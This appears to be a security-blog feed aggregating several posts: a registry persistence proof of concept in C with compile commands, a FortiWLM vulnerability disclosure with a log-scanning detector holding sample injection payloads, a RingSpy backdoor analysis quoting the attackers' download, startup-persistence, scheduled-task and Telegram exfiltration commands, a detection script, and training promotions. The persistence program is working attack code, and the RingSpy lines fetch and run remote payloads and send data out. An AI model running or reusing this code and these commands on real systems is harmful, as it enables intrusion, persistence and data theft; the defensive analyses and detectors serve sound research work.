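    for name, note in cross_check(SAMPLE_APPROVED, SAMPLE_RUN):
        print(f"{name}: {note}")
```

Run the same cross-check against the StartupFolder subkey and the HKLM copies of both keys; the example only covers HKCU\...\Run because that is the key the post writes to.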

demo

Let’s go to see everything in action. First of all, compile our “malware” DLL:

x86_64-w64-mingw32-g++ -shared -o hack.dll hack.c -fpermissive


Then, compile our PoC:

x86_64-w64-mingw32-g++ -O2 pers.c -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


Finally, run it on the victim’s machine. In my case, on a Windows 10 x64 v1903 VM, it looks like this:

.\pers.exe


As you can see, I also checked registry again:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved" /s


Then, log out and log in again.

But unexpectedly it didn’t work for me…

So I just changed the name of the entry: the value name now points at C:\temp\hack.dll instead of the Z:\ path.

After logging out and in again and waiting a little, it worked perfectly.

So I updated one line in my script:

/*
pers.c
windows persistence
via StartupApproved
author: @cocomelonc
https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html
*/
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  BYTE data[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};

  const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run";
  const char* evil = "C:\\temp\\hack.dll";

  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) path, 0, KEY_WRITE, &hkey);
  printf (res != ERROR_SUCCESS ? "failed open registry key :(\n" : "successfully open registry key :)\n");
  if (res != ERROR_SUCCESS) return 1; // no handle to write to

  res = RegSetValueEx(hkey, (LPCSTR)evil, 0, REG_BINARY, data, sizeof(data));
  printf(res != ERROR_SUCCESS ? "failed to set registry value :(\n" : "successfully set registry value :)\n");

  // close the registry key
  RegCloseKey(hkey);

  return 0;
}

But there is a caveat. Sometimes when I tested this feature, it launched like Skype for me.

As you can see, everything worked perfectly as expected! =^..^= :)

Registry Run-key persistence (ATT&CK T1547.001), of which this is a variant, is used in the wild by APT groups such as APT28, APT29, Kimsuky and APT33. In all honesty, this method is widely employed because it is extremely convenient for deceiving victims.

I hope this post spreads awareness of this interesting technique among blue teamers, and adds a weapon to the red teamers’ arsenal.

This is a practical case for educational purposes only.

ATT&CK MITRE: T1547.001
Malware persistence: part 1
APT28
APT29
Kimsuky
APT33
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Starting 2024 strong – The largest launch of security training from OffSec

By: OffSec
14 March 2024 at 15:11

Strong cybersecurity relies on an understanding of the importance of security throughout the entire organization. OffSec is committed to delivering security training to offensive, defensive, development and IT teams that can best protect organizations.

In the first 10 weeks of 2024, we’ve released new learning paths to support more security training across the organization. No matter your role or area of expertise, this training will help develop a security mindset for more folks within your organization.

We’ve put together a 20-minute highlight video explaining all the cool stuff that we’ve released and what’s coming in the next 10 weeks. 


The post Starting 2024 strong – The largest launch of security training from OffSec appeared first on OffSec.

Fortinet FortiWLM Deep-Dive, IOCs, and the Almost Story of the “Forti Forty”

14 March 2024 at 09:45

Early in 2023, soon after reproducing a remote code execution vulnerability in Fortinet FortiNAC, I was on the hunt for a set of new research targets. Fortinet seemed like a decent place to start given the variety of lesser-known security appliances I had noticed while searching for the FortiNAC firmware. The first target I landed on was the Fortinet Wireless LAN Manager (WLM). The security audit of this appliance began what became the successful but failed journey I dubbed the “Forti Forty”: a goal to find 40 CVEs in Fortinet appliances. The journey ended at 16 mostly critical and high severity issues identified across FortiWLM, FortiSIEM, and another appliance, cut short when Fortinet’s download portal no longer provided access to download their appliances.

This blog details several of the issues discovered in the FortiWLM that have since been patched:

  1. CVE-2023-34993 – Multiple Unauthenticated Command Injections – PSIRT-23-140
  2. CVE-2023-34991 – Unauthenticated SQL Injection – PSIRT-23-142
  3. CVE-2023-42783 – Unauthenticated Arbitrary File Read – PSIRT-23-143
  4. CVE-2023-48782 – Authenticated Command Injection – PSIRT-23-450

Additionally, two vulnerabilities that have not received patches and that together lead to appliance compromise:

  1. Unauthenticated Limited Log File Read – Allows retrieval of arbitrary log files which contain administrator session ID tokens
  2. Static Session ID Vulnerability – Session IDs do not change between sessions for users. Chained with the above issue allows trivial compromise of the device.

Fortinet Wireless LAN Manager Overview

Fortinet’s Wireless LAN Manager allows for ease of management of wireless devices throughout an enterprise. It remotely monitors the devices’ health, performance, and any RF interference, all in a single pane of glass. It’s commonly deployed in large campus settings like universities, hospitals, and other large office footprints, making it a valuable target of interest in today’s threat landscape.

Figure 1. FortiWLM Dashboard

FortiWLM Web Framework and Middleware

The FortiWLM web services are built atop the Apache2 and Django frameworks. The Apache configuration has defined several rewrite rules from the frontend on tcp/443 and passes them back to the Django framework middleware which listens on localhost tcp/8000.

The core of the Django middleware logic lies within the /opt/meru/etc/ws/wlmweb directory. Inspecting the file /opt/meru/etc/ws/wlmweb/wlmweb/wlmrbac.py, within the process_view() function, we see that several endpoints, depending on the request path, are validated against the current request’s session authentication information.

On line 86, two endpoints are explicitly allowed for any request, without any authentication checks:

  1. /ems/cgi-bin/ezrf_upgrade_images.cgi
  2. /ems/cgi-bin/ezrf_lighttpd.cgi

Figure 2. wlmrbac.py authentication checks

Path to Remote Code Execution #1

CVE-2023-34993: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability

This vulnerability allows remote, unauthenticated attackers to inject a crafted malicious string into a request to the /ems/cgi-bin/ezrf_upgrade_images.cgi endpoint that will be executed in the context of root. The issue results from the lack of proper validation of user-supplied input before it reaches a call to the potentially dangerous function system().

The first endpoint explicitly allowed without authentication, /ems/cgi-bin/ezrf_upgrade_images.cgi, can be found at /opt/meru/etc/ws/cgi-bin/ezrf_upgrade_images.cgi. All CGI endpoints are Perl scripts which, depending on the endpoint, parse different request parameters which are sometimes validated, but sometimes not. 

This ezrf_upgrade_images.cgi endpoint parses the op_type request parameter and, depending on its value, passes control to different functions defined within the script.

Figure 3. ezrf_upgrade_images.cgi operation types

The deleteprogressfile() function extracts the progressfile request parameter and then directly passes it to a call to system() without any input validation.

Figure 4. ezrf_upgrade_images.cgi’s vulnerable deleteprogressfile()

Sending a request to this unauthenticated endpoint with op_type=deleteprogressfile and a  malicious string in the progressfile parameter results in remote code execution in the context of the root user.

Figure 5. Unauthenticated RCE as root via the ezrf_upgrade_images.cgi endpoint

Path to Remote Code Execution #2

CVE-2024-???? (0-day): Fortinet FortiWLM Unauthenticated Limited File Read Vulnerability

This vulnerability allows remote, unauthenticated attackers to access and abuse builtin functionality meant to read specific log files on the system via a crafted request to the /ems/cgi-bin/ezrf_lighttpd.cgi endpoint. This issue results from the lack of input validation on request parameters allowing an attacker to traverse directories and read any log file on the system.

The second endpoint explicitly allowed without authentication, /ems/cgi-bin/ezrf_lighttpd.cgi, can be found at /opt/meru/etc/ws/cgi-bin/ezrf_lighttpd.cgi. Again, this CGI endpoint is a Perl script in which different request parameters are not always validated.

When the op_type is upgradelogs, control is passed to the upgradelogs() function. This function will read the specific log file from the system and return its content in the response.

Figure 6. ezrf_lighttpd.cgi upgradelogs() function

Inspecting how the $filename variable is constructed we see that it is partially controlled by the imagename request parameter.

Figure 7. ezrf_lighttpd.cgi attacker controlled input unvalidated

Abusing the lack of input validation, an attacker can construct a request where the imagename parameter contains a path traversal, allowing the attacker to read any log file on the system.

Luckily for an attacker, the FortiWLM has very verbose logs – and logs the session ID of all authenticated users. Abusing the above arbitrary log file read, an attacker can now obtain the session ID of a user and login and also abuse authenticated endpoints.

Figure 8. Leak Session ID with Unauthenticated Arbitrary Log File Read

CVE-2023-48782: Fortinet FortiWLM Authenticated Command Injection Vulnerability

This vulnerability allows remote, authenticated attackers to inject a crafted malicious string in a request to the /ems/cgi-bin/ezrf_switches.cgi endpoint that will be executed in the context of root. The issue results from a lack of proper input validation and the insecure use of dangerous system calls. This endpoint is accessible to both low-privilege users and admins.

The ezrf_switches.cgi endpoint supports several op_type subfunctions related to adding a LAN switch for monitoring. This CGI script can be found at /opt/meru/etc/ws/cgi-bin/ezrf_switches.cgi.

The updateStatus() helper function, called from two different op_type functions, is vulnerable to command injection via both the $switche_table_k_Hostname and $switche_table_k_CommunityString variables, which are derived from user input.

Figure 9. ezrf_switches.cgi vulnerable updateStatus()

Both addSwitche() and editSwitche() functions call the vulnerable updateStatus() helper function without validating any input. 

Figure 10. ezrf_switches.cgi addSwitche() calls updateStatus()

Tracing those variables to where they are declared, they are derived straight from the request parameters Hostname and CommunityString, and are never validated along the way.

Figure 11. ezrf_switches.cgi request parameters unvalidated

Combining both the unauthenticated arbitrary log file read and this authenticated command injection, an unauthenticated attacker can obtain remote code execution in the context of root.

Figure 12. Abusing Unauth Log Read and Auth Command Injection to obtain root RCE

Other Security Issues

The initial report to Fortinet contained a total of 9 specific security issues, largely concentrated on the unauthenticated endpoints discovered in the Django middleware. The authenticated attack surface is large, and at the time contained numerous issues similar in nature to the ones detailed here, all stemming from a lack of input validation. Three additional issues of note (two patched and not used in the attack paths above, one still unpatched) were:

CVE-2023-42783: Fortinet FortiWLM Unauthenticated Arbitrary File Read Vulnerability

This vulnerability allows remote, unauthenticated attackers to access and abuse built-in functionality meant to read specific log files on the system via a crafted request to the /ems/cgi-bin/ezrf_upgrade_images.cgi endpoint, in the uploadstatus function with the progressfile parameter. The issue results from a lack of input validation on request parameters, allowing an attacker to traverse directories and read any file on the system.

CVE-2023-34991: Fortinet FortiWLM Unauthenticated SQL Injection Vulnerability

This vulnerability allows remote, unauthenticated attackers to access and abuse built-in functionality meant to list images on the system via a crafted request to the /ems/cgi-bin/ezrf_upgrade_images.cgi endpoint, in the editimage function with the imageName and description parameters. The issue results from a lack of input validation on request parameters, allowing an attacker to modify a SQL query string.

CVE-2024-???? (0-day): Fortinet FortiWLM Static Session ID Vulnerability

The web session ID token of an authenticated user remains static and unchanged between sessions. Each time a user logs in, they receive the exact same session ID token, and the token stays the same for the lifetime of a boot of the device. An attacker who can obtain this token can hijack sessions and perform administrative actions. The session ID is retrievable with the unpatched limited log file read vulnerability above and can be used to gain administrative permissions on the appliance.

Internet Exposure

While we found it to be popular with State, Local, and Education (SLED) and healthcare customers, internet exposure is fortunately limited to around 15 instances.

Figure 13. Shodan Exposure

Indicators of Compromise

FortiWLM logs the majority of its application activity in the /data/apps/nms/logs directory. Activity related to the exploitation of these issues can be observed in /data/apps/nms/logs/httpd_error_log.log. The example entries below show exploitation of the unauthenticated remote code execution vulnerability, CVE-2023-34993. If defenders suspect that an appliance has been compromised, the logged request parameters should be analyzed for malicious input: shell metacharacters in values passed to the command-injection parameters, path traversal sequences in file name parameters, or SQL syntax in the imageName and description parameters named above.

Figure 14. httpd_error_log.log example entry
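As an added example (not Horizon3's code, and not output from a real appliance), the following Python script applies the request-parameter checks just described to log lines. It assumes each httpd_error_log.log entry carries the requested URI with its query string verbatim, which must be verified against the real file before the regex is trusted; the sample entries at the bottom are constructed for this example, and because the op_type values reaching addSwitche() and editSwitche() are not spelled out above, that check matches on the injected parameters alone.

```python
"""Flag FortiWLM web requests that match the exploitation patterns described above.

Added example, not Horizon3's or Fortinet's code. The log lines at the bottom are
constructed for this example; REQUEST_RE assumes the request URI (with query string)
appears verbatim in each httpd_error_log.log entry.
"""
import re
from urllib.parse import unquote_plus

# Characters that let a value break out of a command built with Perl's system()
SHELL_META = re.compile(r"[;|&`$\n\r]")
# A '..' path component anywhere in the value
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Quote or comment syntax that can alter an SQL string
SQL_META = re.compile(r"'|--|/\*|\bunion\b|\bselect\b", re.IGNORECASE)

REQUEST_RE = re.compile(r"/ems/cgi-bin/(?P<cgi>\w+\.cgi)\?(?P<query>\S*)")


def parse_request(line):
    """Return (cgi_script, {param: value}) from a log line, or None if no request is present."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    params = {}
    for pair in m.group("query").split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return m.group("cgi"), params


def classify(line):
    """Return the names of the exploitation patterns a single log line matches."""
    parsed = parse_request(line)
    if parsed is None:
        return []
    cgi, p = parsed
    op = p.get("op_type", "")
    hits = []
    if cgi == "ezrf_upgrade_images.cgi":
        if op == "deleteprogressfile" and SHELL_META.search(p.get("progressfile", "")):
            hits.append("CVE-2023-34993 unauthenticated command injection (deleteprogressfile)")
        if op == "uploadstatus" and TRAVERSAL.search(p.get("progressfile", "")):
            hits.append("CVE-2023-42783 unauthenticated arbitrary file read (uploadstatus)")
        if op == "editimage" and any(SQL_META.search(p.get(k, "")) for k in ("imageName", "description")):
            hits.append("CVE-2023-34991 unauthenticated SQL injection (editimage)")
    elif cgi == "ezrf_lighttpd.cgi":
        if op == "upgradelogs" and TRAVERSAL.search(p.get("imagename", "")):
            hits.append("unpatched limited log file read (upgradelogs)")
    elif cgi == "ezrf_switches.cgi":
        # addSwitche() and editSwitche() both reach updateStatus(); the exact op_type
        # strings are not given above, so match on the injected parameters instead.
        if any(SHELL_META.search(p.get(k, "")) for k in ("Hostname", "CommunityString")):
            hits.append("CVE-2023-48782 authenticated command injection (updateStatus)")
    return hits


def scan(lines):
    """Return [(line_number, [pattern, ...]), ...] for every line matching at least one pattern."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]


# Constructed log entries (not real FortiWLM output): one benign request and four attacks.
SAMPLE_LOG = [
    '[2024-03-14 10:01:02] [error] [client 203.0.113.5] GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=upgrade_8.6.0.log HTTP/1.1',
    '[2024-03-14 10:01:09] [error] [client 203.0.113.5] GET /ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile=x|id%3E/tmp/o HTTP/1.1',
    '[2024-03-14 10:01:15] [error] [client 203.0.113.5] GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=../../../../data/apps/nms/logs/httpd_error_log.log HTTP/1.1',
    '[2024-03-14 10:02:40] [error] [client 203.0.113.5] POST /ems/cgi-bin/ezrf_switches.cgi?Hostname=10.0.0.1&CommunityString=public`id` HTTP/1.1',
    '[2024-03-14 10:03:01] [error] [client 203.0.113.5] GET /ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=editimage&imageName=a%27+OR+1%3D1--&description=x HTTP/1.1',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Run it directly to print the flagged sample lines, or pass the real file's lines to scan() once REQUEST_RE has been adjusted to the appliance's actual entry layout. The patterns are deliberately broad (any shell metacharacter, any '..' component); tune them against a sample of legitimate traffic before alerting on them.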

Timeline

12 May 2023 – Submitted report to Fortinet PSIRT

15 May 2023 – PSIRT acknowledges receipt

10 July 2023 – PSIRT reproduces issues and indicates fix is in-progress

10 August 2023 – Ask for update, PSIRT responds fix is awaiting release

11 October 2023 – PSIRT releases fixes for 2 reported issues

14 November 2023 – PSIRT releases fixes for 2 more reported issues

21 November 2023 – Indicate to PSIRT intent to publicly disclose all issues

22 November 2023 – PSIRT indicates remaining 3 vulnerabilities will be patched soon

7 December 2023 – PSIRT releases a fix for 1 more reported issue

23 February 2024 – RingZer0 conference talk discussing some of these vulnerabilities

14 March 2024 – This public disclosure after 307 days with two unpatched vulnerabilities

The post Fortinet FortiWLM Deep-Dive, IOCs, and the Almost Story of the “Forti Forty” appeared first on Horizon3.ai.

What’s the true impact on your organization when an employee is phished?

6 March 2024 at 21:00

You can now fully assess the impact of phished credentials on your organization. Tune into this webinar to watch the NodeZero platform evaluating the blast radius of every phished credential as it comes in using the Phishing Impact test.

The post What’s the true impact on your organization when an employee is phished? appeared first on Horizon3.ai.

Mysterious Werewolf hits defense industry with new RingSpy backdoor

By: BI.ZONE
13 March 2024 at 10:42

The criminal group gains initial access through phishing emails with a compressed executable that unleashes RingSpy, an original remote access backdoor.

The BI.ZONE Threat Intelligence team has detected a new campaign by Mysterious Werewolf, a cluster that has been active since at least 2023. This time, the adversaries are targeting defense enterprises. To achieve their goals, they use phishing emails with an archive attached. The archive contains a legitimate PDF document and a malicious CMD file. Once the document is extracted and double-clicked, the exploit launches the CMD file to deliver the RingSpy backdoor to the compromised system. This malware has replaced the Athena agent (Mythic C2 framework) utilized by Mysterious Werewolf in its previous attacks.

Key findings

  1. Mysterious Werewolf continues to use phishing emails and CVE-2023-38831 in WinRAR to run malicious code in target systems.
  2. The threat actors are experimenting with malicious payload. Now they have opted for RingSpy, a Python backdoor, to replace the Athena agent (Mythic C2 framework).
  3. As before, the cluster abuses legitimate services to communicate with compromised systems. Thus, the criminals have turned a Telegram bot into their command-and-control server.

Attack description

The victim presumably receives an email with an archive that enables the criminals to exploit CVE-2023-38831. Opening the legitimate file in the archive launches a malicious script (e.g., O_predostavlenii_kopii_licenzii.pdf .cmd) that:

  • creates a .vbs file (named simply .vbs) in the folder C:\Users\[user]\AppData\Local and writes into it a script that runs the file whose name is passed as an argument
  • creates a 1.bat file in the folder C:\Users\[user]\AppData\Local and launches it with a command call "%localappdata%\.vbs" "%localappdata%\1.bat"
  • self-deletes after the launch:
    (goto) 2>nul & del "%~f0"

The running of 1.bat makes it possible to:

  • obtain the download link for the next stage of intrusion and save it in the r file in the folder C:\Users\[user]\AppData\Local:
    curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
  • download the file via the previously obtained link:
    set /p B=<"C:\Users\[redacted]\AppData\Local\r"
    curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
  • delete the file with the download link:
    del /s /q "C:\Users\thesage\AppData\Local\r
  • run the downloaded file with the help of .vbs:
    call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat
  • self-delete after the launch:
    (goto) 2>nul & del "%~f0"

The running of the i.bat script makes it possible to:

  • prevent the repeat installation by checking the presence of the file C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db; if missing, the file is created and its execution continues:
    if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" (
    exit 0
    )
    echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db"
  • obtain the download address; download, open, and delete the decoy document (see the screenshot below) as well as delete the file with the download link:
    curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    set /p B=<"%PDF_FOLDER%\r"
    curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    start "" "%PDF_FOLDER%\O predostavlenii licens.pdf"
    del /s /q "%PDF_FOLDER%\r"
Decoy document
  • download the Python interpreter from the official website and unpack it to the folder C:\Users\[redacted]\AppData\Local\Python, and finally delete the archive:
    curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip"
    if exist "%FOLDER%" (
    rmdir /s /q "%FOLDER%"
    mkdir "%FOLDER%"
    ) else (
    mkdir "%FOLDER%"
    )
    tar -xf %localappdata%\python.zip -C "%FOLDER%"
    del /s /q %localappdata%\python.zip.
    The variables used are:
    FOLDER=%localappdata%\Python
    PYTHON_VERSION_FIRST_TWO_PARTS=3.11
    PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
  • assign an attribute to the hidden folder C:\Users\[redacted]\AppData\Local\Python:
    attrib +h "%FOLDER%" /s /d
  • create the file C:\Users\[redacted]\AppData\Local\python311._pth with the following content:
    Lib/site-packages
    python.zip
    .
    # Uncomment to run site.main() automatically
    import site
  • obtain and launch the pip installer to download additional packages:
    (cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py)
    call python -m pip install requests
    call python -m pip install schedule
    del /s /q get-pip.py
  • save the configuration for connecting RingSpy with a Telegram bot in the file C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloud
  • download RingSpy’s Python script via the Yandex Cloud API:
    curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    set /p B=<"%FOLDER%\r"
    echo "%B:~9,426%"
    curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    del /s /q "%FOLDER%\r"
    Where the .vbs file exists in the folder C:\Users\[user]\AppData\Local, it is deleted.
  • create the python.vbs file in the folder C:\Users\[redacted]\AppData\Local\Python with the following content:
    Set oShell = CreateObject("Wscript.Shell")
    oShell.Run "C:\Users\[redacted]\AppData\Local\Python\python.exe" "C:\Users\[redacted]\AppData\Local\Python\f.py", 0, true
  • copy the created file to the startup folder:
    copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
  • execute the created file:
    call "%localappdata%\Python\python.vbs"
  • run the downloaded backdoor file and self-delete, even if the .vbs file is missing:
    (goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"

The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources. With the -f launch option enabled, RingSpy creates a scheduled task to run the python.vbs script every minute:

powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr '{local}\\Python\\python.vbs' /sc minute /mo 1

The backdoor’s C2 server is a Telegram bot. When the commands are successfully executed, their output is recorded into the file C:\Users\[redacted]\AppData\Local\Python\rs.txt to be sent as a file to the C2 server.

Downloading the file from the specified network location requires the following PowerShell command:

powershell.exe Invoke-WebRequest -Uri "http://[network resource]/[file name]" -OutFile " C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Ringtones\[file name]"

The files are sent to the C2 server via https://api.telegram.org/bot[bot token]/sendDocument while the text is transferred through https://api.telegram.org/bot[bot token]/sendMessage.
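To turn the chain above into a hunt, here is an added Python example (not BI.ZONE's code) that scores process and file events per host against the distinctive pieces of the scripts quoted above: the Yandex Disk download API calls carrying an OAuth header, the embeddable Python download, the hidden Python folder, the python.vbs startup copy, the GoogleUpdatess task, the f.py launch, and the Telegram Bot API. The events, the rule weights and the alert threshold are this example's own constructions; the hashes are the three published under Indicators of compromise below.

```python
"""Score host events against the RingSpy delivery chain described above.

Added example, not BI.ZONE's code. The regexes follow the script fragments quoted above;
the sample events, the rule weights and the alert threshold are constructed for this example.
"""
import re

# (rule name, pattern over the command line, weight)
RULES = [
    ("yandex_disk_download_api", re.compile(r"cloud-api\.yandex\.net/v1/disk/resources/download", re.I), 3),
    ("curl_with_oauth_header", re.compile(r'\bcurl\b.*-H\s+"Authorization:\s*OAuth\b', re.I), 2),
    ("embedded_python_fetch", re.compile(r"python\.org/ftp/python/[\d.]+/python-[\d.]+-embed-amd64\.zip", re.I), 2),
    ("hide_python_dir", re.compile(r'\battrib\s+\+h\s+"?(?:%localappdata%|[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local)\\Python\b', re.I), 2),
    ("startup_vbs_copy", re.compile(r"\bcopy\b.*python\.vbs.*\\Start Menu\\Programs\\Startup", re.I), 3),
    ("schtasks_googleupdatess", re.compile(r"schtasks\s+/create\s+/tn\s+'?GoogleUpdatess'?", re.I), 4),
    ("ringspy_launch", re.compile(r'python(?:\.exe)?"?\s+"?[^"\s]*\\Python\\f\.py', re.I), 3),
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot", re.I), 3),
]
WEIGHTS = {name: weight for name, _, weight in RULES}
WEIGHTS["known_ringspy_hash"] = 5
ALERT_THRESHOLD = 5  # assumption: roughly two chain stages, or the hash alone, on one host

# Hashes of the RingSpy sample listed under Indicators of compromise below.
KNOWN_HASHES = {
    "5183844b5e67e204efa4b44e12fa8f4e",
    "76b0c05bf735fc5e792041842c4b486a9bf750d1",
    "9eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa",
}


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in one command line."""
    return [name for name, rx, _ in RULES if rx.search(cmdline)]


def score_host(events):
    """(score, sorted rule names) for one host, counting each rule once however often it fires."""
    matched = set()
    for ev in events:
        matched.update(match_rules(ev.get("cmdline", "")))
        if ev.get("sha256", "").lower() in KNOWN_HASHES or ev.get("md5", "").lower() in KNOWN_HASHES:
            matched.add("known_ringspy_hash")
    return sum(WEIGHTS[m] for m in matched), sorted(matched)


def triage(events):
    """{host: (score, rules)} for every host at or above ALERT_THRESHOLD."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = {}
    for host, evs in by_host.items():
        score, rules = score_host(evs)
        if score >= ALERT_THRESHOLD:
            alerts[host] = (score, rules)
    return alerts


# Constructed events: one host carrying most of the chain, one that only fetched embeddable Python.
SAMPLE_EVENTS = [
    {"host": "WS-17", "cmdline": r'cmd.exe /c curl -o "C:\Users\jdoe\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth REDACTED" -H "Content-Type: application/json"'},
    {"host": "WS-17", "cmdline": r'attrib +h "C:\Users\jdoe\AppData\Local\Python" /s /d'},
    {"host": "WS-17", "cmdline": r"powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr 'C:\Users\jdoe\AppData\Local\Python\python.vbs' /sc minute /mo 1"},
    {"host": "WS-17", "cmdline": r'"C:\Users\jdoe\AppData\Local\Python\python.exe" "C:\Users\jdoe\AppData\Local\Python\f.py"'},
    {"host": "WS-17", "cmdline": "", "sha256": "9eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa"},  # file-create event for f.py
    {"host": "WS-02", "cmdline": r'curl -s -o C:\Users\asmith\AppData\Local\python.zip -L -O "https://www.python.org/ftp/python/3.11.4/python-3.11.4-embed-amd64.zip"'},
    {"host": "WS-02", "cmdline": "python.exe -m pip install requests"},
]

if __name__ == "__main__":
    for host, (score, rules) in triage(SAMPLE_EVENTS).items():
        print(f"{host}: score {score}: {', '.join(rules)}")
```

Each rule counts once per host no matter how often it fires, so the score reflects how many distinct stages of the chain a host exhibits rather than how noisy one stage was; the embeddable-Python download on its own stays below the threshold, which is the intended behaviour because developers fetch that archive legitimately.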

Indicators of compromise

5183844b5e67e204efa4b44e12fa8f4e
76b0c05bf735fc5e792041842c4b486a9bf750d1
9eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

Conclusions

The Mysterious Werewolf cluster continues to develop its attack methods. This time, the threat actors focus on the critical infrastructure of the defense industry. To communicate with the compromised systems, they resort to legitimate services more frequently than before. This once again proves the need for effective endpoint protection and round-the-clock monitoring, for example, as part of the BI.ZONE TDR service. Meanwhile, with real-time insights from the BI.ZONE Threat Intelligence platform, you can stay updated on the new methods employed at early attack stages and improve the effectiveness of your security solutions.

Cloud security training: Build secure cloud systems

By: OffSec
12 March 2024 at 13:44

The cloud’s potential is undeniable – but securing it remains a daunting challenge. A recent SC Magazine survey revealed a troubling statistic: one in four companies cite a critical cloud security skills gap. This gap leaves organizations vulnerable, as attackers exploit everything from exposed cloud storage buckets to vulnerabilities in development pipelines. Generic tutorials and vendor-focused hype aren’t enough – teams need hands-on experience to grasp the complexities of real-world cloud security. That’s where OffSec’s new Cloud Essentials and Offensive Cloud Learning Paths deliver, providing the actionable training you need to bolster cloud security – whether you’re building cloud environments or testing their resilience.

OffSec’s answer: Build real-world cloud security expertise

Too much cloud training focuses on abstract concepts and vendor-specific tools, leaving you ill-equipped to handle the realities of cloud security.

... Read more »

The post Cloud security training: Build secure cloud systems appeared first on OffSec.

Cybersecurity training aligned with the MITRE ATT&CK framework

By: OffSec
12 March 2024 at 13:11

The MITRE ATT&CK framework was developed in 2013 as a knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is a foundation for specific threat models and methodologies in the private sector, government, and cybersecurity product and service community.

This MITRE ATT&CK Enterprise framework is used by many of our customers to understand their teams’ existing skills and develop new learning plans to address skill gaps and protect the organization’s attack surface.

As we continue to meet our mission to empower individuals and organizations to fight cyber threats with indispensable cybersecurity skills and resources, we’ve developed 12 learning paths that are aligned with the MITRE ATT&CK framework. OffSec training and content cover nearly 70% of the skills required to match the entire attack framework.

... Read more »

The post Cybersecurity training aligned with the MITRE ATT&CK framework appeared first on OffSec.

A CTI Analyst Homelab

11 March 2024 at 19:13
Intro

As career plans, personal interests and the overall curiosity of exploring new technologies change, so does a homelab. It has been a few years since my last homelab writeup and at the time, the focus was geared towards malware analysis without much else. Career goals have shifted to more of a defensive side towards threat hunting and detection engineering so I wanted to build something to support those two fields.

CISSP exam tips and tricks: Avoiding common mistakes | Cyber Work Hacks

By: Infosec
11 March 2024 at 18:00

